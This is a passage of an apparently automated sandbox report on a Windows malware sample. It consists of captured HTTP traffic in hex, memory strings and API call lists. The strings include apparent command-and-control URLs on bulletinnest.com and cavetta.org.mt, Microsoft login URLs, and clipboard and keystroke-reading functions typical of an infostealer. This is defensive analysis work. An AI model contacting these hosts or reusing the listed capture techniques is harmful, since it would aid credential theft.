6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 62 75 6c 6c 65 74 69 6e 6e 65 73 74 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 36 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 62 75 6c 6c 65 74 69 6e 6e 65 73 74 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 36 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 62 75 6c 6c 65 74 69 6e 6e 65 73 74 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:35 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:38 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:40 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:43 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
            Source: convert.exe, 00000008.00000002.4580175851.000000000490A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.00000000042FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2
            Source: convert.exe, 00000008.00000002.4580175851.0000000004C2E000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000461E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4580723330.0000000005253000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cavetta.org.mt
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4580723330.0000000005253000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cavetta.org.mt/yhnb/
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: convert.exe, 00000008.00000002.4580175851.0000000003C7A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000366A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: convert.exe, 00000008.00000002.4573809328.0000000002949000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: convert.exe, 00000008.00000003.2745440600.00000000077EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: convert.exe, 00000008.00000002.4573809328.0000000002949000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0088425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0088425A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00884458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00884458
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0088425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0088425A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00870219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_00870219
